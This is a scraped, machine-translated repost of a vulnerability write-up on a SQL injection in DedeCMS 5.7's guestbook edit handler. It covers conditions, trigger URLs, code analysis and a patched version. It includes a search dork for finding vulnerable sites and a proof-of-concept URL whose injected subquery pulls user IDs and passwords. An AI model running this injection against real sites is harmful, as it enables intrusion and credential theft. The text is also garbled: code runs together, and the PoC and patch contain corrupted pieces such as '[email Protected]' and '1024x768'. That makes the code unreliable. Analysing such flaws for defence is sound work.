Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php

Source: Internet
Author: User
Tags sql injection

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

The following conditions are required for successful injection of vulnerabilities

1. php magic_quotes_gpc=off2. The vulnerability file exists: plus/guestbook.php3. In the database: Dede_guestbook also needs to exist

Relevant Link:

inurl:/plus/guestbook.php


2. Vulnerability Trigger Condition

1. http//localhost/dedecms5.7/plus/guestbook.php2. The ID of the visitor's message can be found on [Reply/edit]. Then note the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=13. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc ' &id=14. After submission, if it is a dede5.7 version, it will appear"successfully change or reply to a message", it proves the change was successful.5. Back to: http://localhost/dedecms5.7/plus/guestbook.php, look at the change of the message whether the content has become errs.cc ' if so, it proves that the vulnerability could not be exploited should be opened for him: Php MAGIC_QUOTES_GPC =off6If no modification succeeds, the content of the message ID is still previous, which proves that the vulnerability can be exploited. 7. Then visit again: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg= ', Msg=user (), email= ' 8. Then return, the content of the message ID is directly modified to the MySQL user ().

relevant Link:

http://www.51php.com/dedecms/16942.htmlhttp://www.wooyun.org/bugs/ wooyun-2012-014501


3. Vulnerability Impact Range

0x1:poc

View Sourceprint? 1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=', [email Protected] ", msg= (SelecT CONCAT (userid,0x7c, pwd) from '%0,1) , email='

Relevant Link:

http://www.programgo.com/article/45492569994/http://www.cnblogs.com/Hkadmin/p/ 3712667.html


4. Vulnerability Code Analysis

/plus/guestbook.php

// Modify Message if ($action = ='admin') {    include_once (dirname (__file__). ' /guestbook/edit.inc.php ' );    Exit ();}

\plus\guestbook\edit.inc.php

//instead of judging $g_isadmin, we mistakenly trust the user's input: action = "Admin"Else if($job = ='Editok') {$remsg=trim ($remsg); //There is no filter for $msg, which can be injected arbitrarily$dsql->executenonequery ("Update ' #@__guestbook ' Set ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' where id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}

Relevant Link:

http://pannisec.diandian.com/?tag=sql%e6%b3%a8%e5%b0%84


5. Defense Methods

\plus\guestbook\edit.inc.php

Else if($job = ='Editok') {$remsg=trim ($remsg); /*Verify $g_isadmin*/    if($remsg! ="')    {        //Admin reply does not filter HTML        if($g _isadmin) {$msg="<div class=\\ ' rebox\\ ' >". $msg."</div>\n". $remsg; //$remsg <br><font color=red> Admin reply:</font>        }        Else{$row= $dsql->getone ("SELECT msg from ' #@__guestbook ' WHERE id= ' $id '"); $oldmsg="<div class=\\ ' rebox\\ ' >". addslashes ($row ['msg'])."</div>\n"; $remsg= Trimmsg (CN_SUBSTRR ($remsg,1024x768),1); $msg=$oldmsg. $remsg; }    }    /* */    /*effective filtering of the $msg*/$msg=addslashes ($msg); /* */$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' WHERE id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}


6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.